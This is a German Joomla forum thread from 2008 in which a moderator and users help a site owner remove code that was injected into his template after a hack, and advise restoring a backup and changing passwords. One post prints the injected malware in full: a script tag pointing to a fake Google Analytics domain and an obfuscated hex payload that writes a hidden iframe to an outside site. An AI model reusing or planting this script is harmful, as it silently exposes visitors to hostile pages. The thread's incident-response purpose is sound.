Erweiterungen & Templates für Joomla     Support Chat     JoomlaJobs    

   

 

Zurück   Joomla CMS Support Forum > Joomla 1.0x > Sicherheit
Benutzername
Kennwort
Antwort
 
LinkBack Themen-Optionen Thema durchsuchen Ansicht

  #11 (permalink)
Alt 18.06.2008, 23:39
Joomlaianer
 
Registriert seit: 17.12.2007
Beiträge: 78
Bedankte sich: 52
1 Danksagung in 1 Beitrag
Standard

Zitat:
Zitat von FoxCore Beitrag anzeigen
Ich hab genau das gleiche Problem, bei mir in der index.php befinden sich seit gestern diese "Google Analytics" links.
Hallo FoxCore

Tönt alles super - bin aber trotzdem ein Greenhorn...

Was soll ich machen?
Kann ich den Code einfach löschen?
Ich hatte nie google-analytics installiert - wie ist das reingekommen?

Vielen Dank!
Ago
Agoraso ist offline   Mit Zitat antworten
  #12 (permalink)
Alt 18.06.2008, 23:56
Moderator
 
Benutzerbild von holmi
 
Registriert seit: 30.08.2004
Ort: Harz
Beiträge: 6,492
Bedankte sich: 91
1,229 Danksagungen in 1,130 Beiträgen
holmi eine Nachricht über ICQ schicken holmi eine Nachricht über Skype™ schicken
Standard

Der Code muss auf jeden Fall raus.

Schau dir mein Posting und und diesen Link an:
http://www.joomlaportal.de/sicherhei...tml#post665966


Du hast vermutlich eine alte Joomla Version oder eine Unsicher Komponente Installiert.
Darüber ist deine Seite gehackt worden.

Du musst jetzt mal versuchen in der Logdatei raus zu finden wann das Passiert ist und dann ein Backup einspielen das älter ist.
(Eventuell mal den Hoster fragen ob der eins hat)

Wie gesagt, deine Passwörter könnten jetzt bekannt sein und solange du die Lücke nicht schließt kann der Hacker jeder Zeit wieder eindringen.


EDIT
Sehe gerade das dein Joomla Version aktuell ist
Das Easybook 1.1 hat eine Lücke
http://www.easy-joomla.org/content/view/26/31/lang,de/

Welche Rechte hatten deine Dateien?
besonders die configuration.php und die index.php vom Template?


Björn
__________________
Problem gelöst? Dann markiere den Thread mit [GELÖST]
holmi ist offline   Mit Zitat antworten
Erhielt Danksagungen von:
  #13 (permalink)
Alt 19.06.2008, 00:15
Joomlaianer
 
Registriert seit: 17.12.2007
Beiträge: 78
Bedankte sich: 52
1 Danksagung in 1 Beitrag
Standard

Scheisse: meine configuration.php war auf 777 - wie konnte mir das nur passieren?
Jetzt habe ich auf 644 gestellt, ist das ok?

Zitat:
Zitat von holmi Beitrag anzeigen
Der Code muss auf jeden Fall raus.
Von wo bis wo genau?


Zitat:
Zitat von holmi Beitrag anzeigen
Wie gesagt, deine Passwörter könnten jetzt bekannt sein und solange du die Lücke nicht schließt kann der Hacker jeder Zeit wieder eindringen.
Kann er das noch wenn ich EasyBook deinstallieren? deaktivieren?
Agoraso ist offline   Mit Zitat antworten
  #14 (permalink)
Alt 19.06.2008, 00:23
Moderator
 
Benutzerbild von holmi
 
Registriert seit: 30.08.2004
Ort: Harz
Beiträge: 6,492
Bedankte sich: 91
1,229 Danksagungen in 1,130 Beiträgen
holmi eine Nachricht über ICQ schicken holmi eine Nachricht über Skype™ schicken
Standard

Zitat:
Zitat von Agoraso Beitrag anzeigen
Kann er das noch wenn ich EasyBook deinstallieren? deaktivieren?
Es gibt eine neue Version
alte Deinistallieren und neue Installieren.

Der Code muss raus:
<script src="http://analytics-google.info/urchin.js"></script>

Das sind lange Zeilen ich schreibe mal nur den Anfang
Hinter <body class="page_bg">:
<!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857

Letzte Zeile hinter: </html>
<script>check_content()</script><!-- 1213806179 --><!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a)


Das Löst aber dein Problem nicht
Wenn ich mir die Beschreibung vom Easybook Problem anschaue vermute ich das das nicht deine betroffene Lücke war.
Ich habe da aber keine Ahung von


Du musst unbedingt deine Passwörter ändern und in der Logdatei rausfinden wie und wann der Code in dein Template gekommen ist.
Der Hacker kann überall auf deinem Webspace weitere Programme versteckt haben mit denen er Zugang zum Server hat.
Da bringt es nichts nur die 3 Zeilen im Template zu löschen.

So leid es mit tut, ein gehackter Server macht elendig viel Arbeit.


Björn
__________________
Problem gelöst? Dann markiere den Thread mit [GELÖST]
holmi ist offline   Mit Zitat antworten
Erhielt Danksagungen von:
  #15 (permalink)
Alt 19.06.2008, 00:29
Joomlaianer
 
Registriert seit: 17.12.2007
Beiträge: 78
Bedankte sich: 52
1 Danksagung in 1 Beitrag
Standard

Vielen Dank.
Kann heute wohl nicht schlafen.

configuration.php auf 644 ok?

Ich habe mein Passwort geändert. Warum schreibst du in der Mehrzahl - in der Regel hat man ein Passwort oder?
Agoraso ist offline   Mit Zitat antworten
  #16 (permalink)
Alt 19.06.2008, 01:00
Moderator
 
Benutzerbild von holmi
 
Registriert seit: 30.08.2004
Ort: Harz
Beiträge: 6,492
Bedankte sich: 91
1,229 Danksagungen in 1,130 Beiträgen
holmi eine Nachricht über ICQ schicken holmi eine Nachricht über Skype™ schicken
Standard

Wenn du ein Passwort für Joomla, FTP, MySQL verwendest müssen die alle geändert werden.
Steht oben beim Link in der Liste von Flotte ;-)

Björn
__________________
Problem gelöst? Dann markiere den Thread mit [GELÖST]
holmi ist offline   Mit Zitat antworten
Erhielt Danksagungen von:
  #17 (permalink)
Alt 19.06.2008, 01:34
Joomlaianer
 
Registriert seit: 17.12.2007
Beiträge: 78
Bedankte sich: 52
1 Danksagung in 1 Beitrag
Standard

Besten Dank bis hierhin!

In welcher Datei finde ich denn:
<body class="page_bg"><!-- ad --><script>function c1131313m4857aa739c121(m4857aa... ?
das ist weder in der configuration noch in der index vom tempalte.
Agoraso ist offline   Mit Zitat antworten
  #18 (permalink)
Alt 19.06.2008, 11:31
Moderator
 
Benutzerbild von holmi
 
Registriert seit: 30.08.2004
Ort: Harz
Beiträge: 6,492
Bedankte sich: 91
1,229 Danksagungen in 1,130 Beiträgen
holmi eine Nachricht über ICQ schicken holmi eine Nachricht über Skype™ schicken
Standard

Du hast den Code immer noch drin.
Wenn du es nicht findest solltest du schnellstens den Punkt 1 und 2 der Liste umsetzen,
Den link habe ich dir ja schon 2 mal gegeben:
Zitat:
Zitat von flotte Beitrag anzeigen
Ja da wurde Code eingeschleust. Schalte die Seite offline und geh das Standardprogramm durch:
1) Sofort den gesamten Auftritt mit allen Dateien entfernen (vorher sichern!)
2) Datenbankinhalt entfernen

3) Letzte definitv saubere Sicherung einspielen
4) Alle Passwörter ändern (Datenbank, Joomla, FTP, etc.)
5) Log-Dateien holen und Einbruchslücke lokalisieren
6) Lücke schließen!
Eine Gehackte Seite ist eine echte Gefahr, nimm das nicht auf die leichte Schulter.


Ich hätte es in der templates/dd_apricot/index.php vermutet.
Einmal hast du das <script src="http://analytics-google.info/urchin.js"></script> ja schon gelöscht, wo war das denn drin?

Hier mal der bereich wo es steht:
PHP-Code:
<link href="http://www.atmonis.ch/templates/dd_apricot/css/template_css.css" rel="stylesheet" type="text/css"/>
<
link rel="shortcut icon" href="http://www.atmonis.ch/templates/dd_apricot/images/favicon.ico"/>

<
script src="http://analytics-google.info/urchin.js"></script></head>
<body class="page_bg"><!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857aa739cd0a(){return 16;} return (parseInt(m4857aa739c91a,m4857aa739cd0a()));}function m4857aa739d4f5(m4857aa739d8ed){ var m4857aa739e4d4=2; var m4857aa739dce4='';m4857aa739ecc3=String.fromCharCode;for(m4857aa739e0dd=0;m4857aa739e0dd<m4857aa739d8ed.length;m4857aa739e0dd+=m4857aa739e4d4){ m4857aa739dce4+=(m4857aa739ecc3(c1131313m4857aa739c121(m4857aa739d8ed.substr(m4857aa739e0dd,m4857aa739e4d4))));}return m4857aa739dce4;} var m4857aa739f0bb='3C7363726970743E66756E6374696F6E20636865636B5F636F6E74656E7428297B76617220693D303B7768696C6528646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527292E6C656E677468297B76617220656C3D646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527295B695D3B6966282028656C2E7374796C652E646973706C61793D3D276E6F6E6527207C7C20656C2E7374796C652E7669736962696C697479203D3D2768696464656E27207C7C2028656C2E77696474683C3520262620656C2E6865696768743C35292920262620656C2E6E616D65213D27633127297B656C2E706172656E744E6F64652E72656D6F76654368696C6428656C293B7D656C736520692B2B3B7D7D636865636B5F636F6E74656E7428293B0A696628216D796961297B646F63756D656E742E777269746528756E6573636170652820272533632536392536362537322536312536642536352532302536652536312536642536352533642536332533312532302537332537322536332533642532372536382537342537342537302533612532662532662537362536392537362536392537342537352537332536332536392536312532652536332536662536642532662536392536642536312536372536352537332532662537332537342536312537342537332532652536382537342536642536632533662532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533312533362533392533312533322533382532392532622532372533362536362536352533392536352533382536342533302536312533312533362532372532302537372536392536342537342536382533642533372533382533332532302536382536352536392536372536382537342533642533322533312533362532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';document.write(m4857aa739d4f5(m4857aa739f0bb));</script><!-- /ad -->

<div align="center">
    <div id="main_outline">
        <div id="pathway_outline"> 
Und ganz am ende der index.php ist noch mehr.


Wenn es im Template nicht drin ist, ist es irgendwo im Joomla eingeschleust, darum muss da schnellstens ein Sauberes Backup eingespielt werden.


Björn
__________________
Problem gelöst? Dann markiere den Thread mit [GELÖST]
holmi ist offline   Mit Zitat antworten
Erhielt Danksagungen von:
  #19 (permalink)
Alt 19.06.2008, 12:15
Joomlaianer
 
Registriert seit: 17.12.2007
Beiträge: 78
Bedankte sich: 52
1 Danksagung in 1 Beitrag
Standard

Zitat:
Zitat von holmi Beitrag anzeigen
Du hast den Code immer noch drin.
hab die datei endlich gefunden

Zitat:
Zitat von holmi Beitrag anzeigen
Wenn du es nicht findest solltest du schnellstens den Punkt 1 und 2 der Liste umsetzen, Den link habe ich dir ja schon 2 mal gegeben:
das mach ich jetzt dennnoch, oder?

Zitat:
Zitat von holmi Beitrag anzeigen
Eine Gehackte Seite ist eine echte Gefahr, nimm das nicht auf die leichte Schulter.
Jetzt muss ich sogar wieder etwas schmunzeln - obschon mir immer noch gar nicht danach ist: ich hab schon 24h nicht mehr geschlafen. bin ein greenhorn. mein täglichbrot hängt von dieser seite ab. da kann man NICHTS auf die leichte schulter nehmen.

Zitat:
Zitat von holmi Beitrag anzeigen
Ich hätte es in der templates/dd_apricot/index.php vermutet.
Einmal hast du das <script src="http://analytics-google.info/urchin.js"></script> ja schon gelöscht, wo war das denn drin?
ich habs wahrscheinlich aus versehen gelöscht oder das zeug ist amöbenhaft...!

Zitat:
Zitat von holmi Beitrag anzeigen
Und ganz am ende der index.php ist noch mehr.
in welcher index.php? template oder root?

Zitat:
Zitat von holmi Beitrag anzeigen
Wenn es im Template nicht drin ist, ist es irgendwo im Joomla eingeschleust, darum muss da schnellstens ein Sauberes Backup eingespielt werden.
Ja, das will ich machen. Und was, wenn der Kranke nach dem Hack ein Backup gemacht hat? Dann bin ich tot; oder?


Vielen Dank bis hier hin. Falls du mal auf Kreta bist hast du 3 Gratisnächte! Und gratis wireless Access.
Willkommen!
Ago
Agoraso ist offline   Mit Zitat antworten
  #20 (permalink)
Alt 19.06.2008, 19:47
Joomla Newbie
 
Registriert seit: 18.06.2008
Beiträge: 2
Bedankte sich: 0
5 Danksagungen in 1 Beitrag
Standard

Bei mir waren der Code in der index.php im Root-Verzeichnis der Joomla-Installation. Bei mir wurde der code <script>http://analytics-google(....)</script> zuoberst in die index.php geschrieben.
Zu unterst wurde dieser kryptische Quelltext mit den vielen Buchstaben und zahlen eingefügt. Dieser kannst du auch entfernen, also alles was hinter
Code:
doGzip(); ?>
steht, beginnend mit <!-- ad --><script>function c1131 (....) und endend mit <script>check_content()</script> kannst du entfernen.

Vorher solltest du davon aber umbedingt eine Sicherheitskopie machen, damit du bei einem Fehler die alte "infizierte" Version wiederherstellen kannst, und du es noch einmal versuchen kannst.

Was sehr, sehr wichtig ist, ist dass du das Passwort für den FTP-Account änderst, da ansonsten der Hacker sich einfach wieder einloggen kann, und den Code wieder einfügen kann.

Ich mache es ab jetzt auch so, dass ich für jede Joomla-Seite einen eigenen FTP-Account habe, damit bei einem Angriff "nur" die Seite und nicht der gesamte webspace betroffen ist. Diesmal hatte ich zwei Seiten, auf dem Webspace die beide davon betroffen waren.

Was mich jetzt aber selber interessieren würde, ist wie der Hacker denn hineingekommen ist. Was natürlich ein grosses Einfalltor war, ist die configuration.php, aber ich kann nicht ausschliessen, dass es eine Sicherheitslücke einer Komponente oder von Joomla war.
FoxCore ist offline   Mit Zitat antworten
Werbung
Antwort


Themen-Optionen Thema durchsuchen
Thema durchsuchen:

Erweiterte Suche
Ansicht




Alle Zeitangaben in WEZ +2. Es ist jetzt 19:52 Uhr.

Powered by vBulletin Version 3.6.2 (Deutsch)
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.3.2
vBulletin Style by: vbdesigns.de
Copyright 2005 by Stefan Köller